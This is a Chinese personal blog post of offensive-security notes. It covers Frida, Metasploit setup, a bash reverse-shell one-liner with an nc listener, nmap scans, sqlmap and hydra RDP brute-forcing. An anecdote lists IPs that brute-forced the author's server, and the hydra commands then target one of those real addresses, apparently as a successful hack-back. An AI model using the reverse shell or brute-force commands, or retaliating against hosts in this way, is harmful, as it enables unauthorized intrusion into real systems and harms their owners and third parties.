<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>安全 - LTTZZ&#39;s BLOG</title>
  <meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">


<meta name="author" content="lttzz" /><meta name="description" content="" /><meta name="keywords" content="Hugo, theme, even, lttzz" />






<meta name="generator" content="Hugo 0.104.3 with theme even" />


<link rel="canonical" href="https://lttzz.github.io/post/%E5%AE%89%E5%85%A8/" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<link href="/sass/main.min.f92fd13721ddf72129410fd8250e73152cc6f2438082b6c0208dc24ee7c13fc4.css" rel="stylesheet">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css" integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin="anonymous">


<meta property="og:title" content="安全" />
<meta property="og:description" content="" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://lttzz.github.io/post/%E5%AE%89%E5%85%A8/" /><meta property="article:section" content="post" />
<meta property="article:published_time" content="2021-05-01T13:22:38+08:00" />
<meta property="article:modified_time" content="2021-05-01T13:22:38+08:00" />

<meta itemprop="name" content="安全">
<meta itemprop="description" content=""><meta itemprop="datePublished" content="2021-05-01T13:22:38+08:00" />
<meta itemprop="dateModified" content="2021-05-01T13:22:38+08:00" />
<meta itemprop="wordCount" content="876">
<meta itemprop="keywords" content="security,reverse," /><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="安全"/>
<meta name="twitter:description" content=""/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->

</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo">LTTZZ&#39;s BLOG</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <a href="/">
        <li class="mobile-menu-item">Home</li>
      </a><a href="/post/">
        <li class="mobile-menu-item">Archives</li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">Tags</li>
      </a><a href="/books/">
        <li class="mobile-menu-item">Books</li>
      </a><a href="/nonsense/">
        <li class="mobile-menu-item">Nonsense</li>
      </a><a href="/about/">
        <li class="mobile-menu-item">About</li>
      </a>
  </ul>

  


</nav>

  <div class="container" id="mobile-panel">
    <header id="header" class="header">
        <div class="logo-wrapper">
  <a href="/" class="logo">LTTZZ&#39;s BLOG</a>
</div>





<nav class="site-navbar">
  <ul id="menu" class="menu">
    <li class="menu-item">
        <a class="menu-item-link" href="/">Home</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/post/">Archives</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/tags/">Tags</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/books/">Books</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/nonsense/">Nonsense</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/about/">About</a>
      </li>
  </ul>
</nav>

    </header>

    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
    
    <header class="post-header">
      <h1 class="post-title">安全</h1>

      <div class="post-meta">
        <span class="post-time"> 2021-05-01 </span>
        
          <span class="more-meta"> 876 words </span>
          <span class="more-meta"> 2 mins read </span>
        <span id="busuanzi_container_page_pv" class="more-meta"> <span id="busuanzi_value_page_pv"><img src="/img/spinner.svg" alt="spinner.svg"/></span> times read </span>
      </div>
    </header>

    <div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">Contents</h2>
  <div class="post-toc-content">
    <nav id="TableOfContents">
  <ul>
    <li><a href="#0x00-tools">0x00 Tools</a>
      <ul>
        <li><a href="#frida">frida</a>
          <ul>
            <li><a href="#reference">reference</a></li>
          </ul>
        </li>
        <li><a href="#metasploit">Metasploit</a></li>
      </ul>
    </li>
    <li><a href="#0x01-linux">0x01 Linux</a>
      <ul>
        <li><a href="#反弹shell">反弹shell</a></li>
      </ul>
    </li>
    <li><a href="#0x02-windows">0x02 Windows</a>
      <ul>
        <li><a href="#随便写点什么">随便写点什么</a></li>
      </ul>
    </li>
    <li><a href="#0x03-android">0x03 Android</a></li>
    <li><a href="#0x04-web">0x04 Web</a>
      <ul>
        <li><a href="#information-gather">Information Gather</a>
          <ul>
            <li><a href="#nmap">nmap</a></li>
          </ul>
        </li>
        <li><a href="#hydra">hydra</a></li>
        <li><a href="#sql注入">sql注入</a></li>
      </ul>
    </li>
  </ul>
</nav>
  </div>
</div>
    <div class="post-content">
      <h1 id="0x00-tools">0x00 Tools</h1>
<h2 id="frida">frida</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span><span class="lnt">55
</span><span class="lnt">56
</span><span class="lnt">57
</span><span class="lnt">58
</span><span class="lnt">59
</span><span class="lnt">60
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># frida https://github.com/frida/frida</span>
</span></span><span class="line"><span class="cl">$ pip install frida
</span></span><span class="line"><span class="cl">$ pip install frida-tools
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># server https://github.com/frida/frida/releases</span>
</span></span><span class="line"><span class="cl"><span class="c1"># cat /proc/cpuinfo</span>
</span></span><span class="line"><span class="cl"><span class="c1"># genymotion 选 x86</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 执行ps有返回结果，则说明搭建成功</span>
</span></span><span class="line"><span class="cl">$ frida-ps -U
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 版本一定要注意一致，否则可能出现奇奇怪怪的问题</span>
</span></span><span class="line"><span class="cl"><span class="c1"># frida  frida-tools  frida-server</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1">## frida-ps</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Connect Frida to an iPad over USB and list running processes</span>
</span></span><span class="line"><span class="cl">$ frida-ps -U
</span></span><span class="line"><span class="cl"><span class="c1"># List running applications</span>
</span></span><span class="line"><span class="cl">$ frida-ps -Ua
</span></span><span class="line"><span class="cl"><span class="c1"># List installed applications</span>
</span></span><span class="line"><span class="cl">$ frida-ps -Uai
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1">## frida-trace</span>
</span></span><span class="line"><span class="cl">$ frida-trace -U -i open Chrome 
</span></span><span class="line"><span class="cl"><span class="c1"># Trace recv* and send* APIs in Safari, insert library names</span>
</span></span><span class="line"><span class="cl"><span class="c1"># in logging</span>
</span></span><span class="line"><span class="cl">$ frida-trace --decorate -i <span class="s2">&#34;recv*&#34;</span> -i <span class="s2">&#34;send*&#34;</span> Safari
</span></span><span class="line"><span class="cl"><span class="c1"># Trace ObjC method calls in Safari</span>
</span></span><span class="line"><span class="cl">$ frida-trace -m <span class="s2">&#34;-[NSView drawRect:]&#34;</span> Safari
</span></span><span class="line"><span class="cl"><span class="c1"># Launch SnapChat on your iPhone and trace crypto API calls</span>
</span></span><span class="line"><span class="cl">$ frida-trace <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>    -U <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>    -f com.toyopagroup.picaboo <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>    -I <span class="s2">&#34;libcommonCrypto*&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Launch YouTube on your Android device and trace Java methods</span>
</span></span><span class="line"><span class="cl"><span class="c1"># with “certificate” in their signature (s), ignoring case (i)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># and only searching in user-defined classes (u)</span>
</span></span><span class="line"><span class="cl">$ frida-trace <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>    -U <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>    -f com.google.android.youtube <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>    --runtime<span class="o">=</span>v8 <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>    -j <span class="s1">&#39;*!*certificate*/isu&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Trace all JNI functions in Samsung FaceService app on Android</span>
</span></span><span class="line"><span class="cl">$ frida-trace -U -i <span class="s2">&#34;Java_*&#34;</span> com.samsung.faceservice
</span></span><span class="line"><span class="cl"><span class="c1"># Trace a Windows process&#39;s calls to &#34;mem*&#34; functions in msvcrt.dll</span>
</span></span><span class="line"><span class="cl">$ frida-trace -p <span class="m">1372</span> -i <span class="s2">&#34;msvcrt.dll!*mem*&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Trace all functions matching &#34;*open*&#34; in the process except</span>
</span></span><span class="line"><span class="cl"><span class="c1"># in msvcrt.dll</span>
</span></span><span class="line"><span class="cl">$ frida-trace -p <span class="m">1372</span> -i <span class="s2">&#34;*open*&#34;</span> -x <span class="s2">&#34;msvcrt.dll!*open*&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Trace an unexported function in libjpeg.so</span>
</span></span><span class="line"><span class="cl">$ frida-trace -p <span class="m">1372</span> -a <span class="s2">&#34;libjpeg.so!0x4793c&#34;</span>
</span></span><span class="line"><span class="cl">	-i FUNCTION, --include<span class="o">=</span>FUNCTION include <span class="o">[</span>MODULE<span class="o">]</span>!<span class="o">[</span>FUNCTION<span class="o">]</span>
</span></span><span class="line"><span class="cl">  -x FUNCTION, --exclude<span class="o">=</span>FUNCTION exclude <span class="o">[</span>MODULE<span class="o">]</span>!<span class="o">[</span>FUNCTION<span class="o">]</span>
</span></span><span class="line"><span class="cl">  -j JAVA_METHOD, --include-java-method<span class="o">=</span>JAVA_METHOD include JAVA_METHOD
</span></span><span class="line"><span class="cl">  -J JAVA_METHOD, --exclude-java-method<span class="o">=</span>JAVA_METHOD exclude JAVA_METHOD
</span></span><span class="line"><span class="cl">  -d, --decorate        add module name to generated onEnter log statement
</span></span><span class="line"><span class="cl">  -F, --attach-frontmost attach to frontmost application
</span></span><span class="line"><span class="cl">  -n NAME, --attach-name<span class="o">=</span>NAME attach to NAME
</span></span><span class="line"><span class="cl">  -p PID, --attach-pid<span class="o">=</span>PID attach to PID
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="reference">reference</h3>
<p><a href="https://bbs.pediy.com/thread-179524.htm">『Android安全』版优秀和精华帖分类索引</a></p>
<h2 id="metasploit">Metasploit</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 先安装 postgresql 喽</span>
</span></span><span class="line"><span class="cl">$ dnf install  postgresql-server postgresql-contrib
</span></span><span class="line"><span class="cl">$ systemctl <span class="nb">enable</span> postgresql
</span></span><span class="line"><span class="cl">$ systemctl start postgresql		<span class="c1"># 启动不了就重启吧，233</span>
</span></span><span class="line"><span class="cl">$ postgresql-setup --initdb --unit postgresql
</span></span><span class="line"><span class="cl">$ su - postgres
</span></span><span class="line"><span class="cl">$ psql
</span></span><span class="line"><span class="cl">	alter user postgres with password <span class="s1">&#39;password_for_postgres&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	create user msf with password <span class="s1">&#39;password_for_msf&#39;</span> createdb<span class="p">;</span>
</span></span><span class="line"><span class="cl">	create database msf with <span class="nv">owner</span><span class="o">=</span>msf<span class="p">;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h1 id="0x01-linux">0x01 Linux</h1>
<h2 id="反弹shell">反弹shell</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 攻击端监听端口</span>
</span></span><span class="line"><span class="cl">$ nc -lvp <span class="m">2333</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 被攻击端反弹shell</span>
</span></span><span class="line"><span class="cl">$ bash -i &gt;<span class="p">&amp;</span> /dev/tcp/<span class="o">{</span>ip<span class="o">}</span>/<span class="o">{</span>port<span class="o">}</span> 0&gt;<span class="p">&amp;</span><span class="m">1</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h1 id="0x02-windows">0x02 Windows</h1>
<h2 id="随便写点什么">随便写点什么</h2>
<p><img src="/Picbed/2021_10/1020_00.png" alt=""></p>
<p><img src="/Picbed/2021_10/1020_01.png" alt=""></p>
<p>女朋友笔记本是mba，然后有一天要用Windows，就把一台没啥用的服务器装好了Windows Server 2019 Datacenter给她用了。公网ip不能浪费啊，平常会挂点热门种子，刷刷上传。然后有一天登不上去，没想太多，到控制台改了密码就没管。</p>
<p>今天想起来了，看了下日志，1s一次的登陆请求？NtLmSsp登陆爆破可真行，攻击IP如下：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">39.174.37.173
</span></span><span class="line"><span class="cl">47.103.26.179
</span></span><span class="line"><span class="cl">47.103.62.23
</span></span></code></pre></td></tr></table>
</div>
</div><p>很快啊，他也没了。</p>
<p><img src="/Picbed/2021_10/1020_02.png" alt=""></p>
<p>不太对劲的样子，不会是honeypot吧。</p>
<h1 id="0x03-android">0x03 Android</h1>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ps -e <span class="p">|</span> grep <span class="o">{</span>keyword<span class="o">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h1 id="0x04-web">0x04 Web</h1>
<h2 id="information-gather">Information Gather</h2>
<h3 id="nmap">nmap</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 完整扫描，列出详细信息</span>
</span></span><span class="line"><span class="cl">$ nmap –T4 –A –v target_ip
</span></span><span class="line"><span class="cl"><span class="c1"># 主机发现</span>
</span></span><span class="line"><span class="cl">$ nmap -T4 -sn target_ip
</span></span><span class="line"><span class="cl"><span class="c1"># 端口扫描</span>
</span></span><span class="line"><span class="cl">$ nmap -T4 target_ip
</span></span><span class="line"><span class="cl"><span class="c1"># 服务扫描</span>
</span></span><span class="line"><span class="cl">$ nmap -T4 -sV target_ip
</span></span><span class="line"><span class="cl"><span class="c1"># OS探测</span>
</span></span><span class="line"><span class="cl">$ nmap -T4 -O target_ip
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="hydra">hydra</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 3389</span>
</span></span><span class="line"><span class="cl">$ hydra 47.103.26.179 rdp -l administrator -P passwd.txt -V		<span class="c1"># 爆破 administrator</span>
</span></span><span class="line"><span class="cl">$ hydra 47.103.26.179 rdp -L user.txt -P passwd.txt -V
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="sql注入">sql注入</h2>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 获取网站信息</span>
</span></span><span class="line"><span class="cl">sqlmap.py -u http://www.xxx.com/ss?id<span class="o">=</span>xxx
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">sqlmap.py -u http://www.xxx.com/ss?id<span class="o">=</span>xxx --dbs
</span></span></code></pre></td></tr></table>
</div>
</div>
    </div>

    
<footer class="post-footer">
      <div class="post-tags">
          <a href="/tags/security/">security</a>
          <a href="/tags/reverse/">reverse</a>
          </div>
      <nav class="post-nav">
        <a class="prev" href="/post/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/">
            <i class="iconfont icon-left"></i>
            <span class="prev-text nav-default">设计模式</span>
            <span class="prev-text nav-mobile">Prev</span>
          </a>
        <a class="next" href="/post/%E7%AE%97%E6%B3%95/">
            <span class="next-text nav-default">算法</span>
            <span class="next-text nav-mobile">Next</span>
            <i class="iconfont icon-right"></i>
          </a>
      </nav>
    </footer>
  </article>
        </div>
        

      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="social-links">
      <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&amp;email=Snl5fn5-e318cn0KOztkKSUn" class="iconfont icon-email" title="email"></a>
      <a href="https://stackoverflow.com/users/9786406/lttzz" class="iconfont icon-stack-overflow" title="stack-overflow"></a>
      <a href="https://github.com/lttzz" class="iconfont icon-github" title="github"></a>
      <a href="https://weibo.com/lttzz" class="iconfont icon-weibo" title="weibo"></a>
      <a href="https://www.douban.com/people/196540309/" class="iconfont icon-douban" title="douban"></a>
      <a href="https://space.bilibili.com/74153503" class="iconfont icon-bilibili" title="bilibili"></a>
  <a href="https://lttzz.github.io/index.xml" type="application/rss+xml" class="iconfont icon-rss" title="rss"></a>
</div>

<div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://gohugo.io">Hugo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" href="https://github.com/olOwOlo/hugo-theme-even">Even</a>
  </span>

  <div class="busuanzi-footer">
    <span id="busuanzi_container_site_pv"> site pv: <span id="busuanzi_value_site_pv"><img src="/img/spinner.svg" alt="spinner.svg"/></span> </span>
      <span class="division">|</span>
    <span id="busuanzi_container_site_uv"> site uv: <span id="busuanzi_value_site_uv"><img src="/img/spinner.svg" alt="spinner.svg"/></span> </span>
  </div>

  <span class="copyright-year">
    &copy; 
    2019 - 
    2022<span class="heart"><i class="iconfont icon-heart"></i></span><span>lttzz</span>
  </span>
</div>

    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont icon-up"></i>
    </div>
  </div>
  
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js" integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js" integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin="anonymous"></script>



<script type="text/javascript" src="/js/main.min.4ae89da218555efa0e7093a20b92017d2e1202b66fff9fc2edf4cb8d44b44c6e.js"></script>


<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-140228231-1', 'auto');
	ga('set', 'anonymizeIp', true);
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>







</body>
</html>
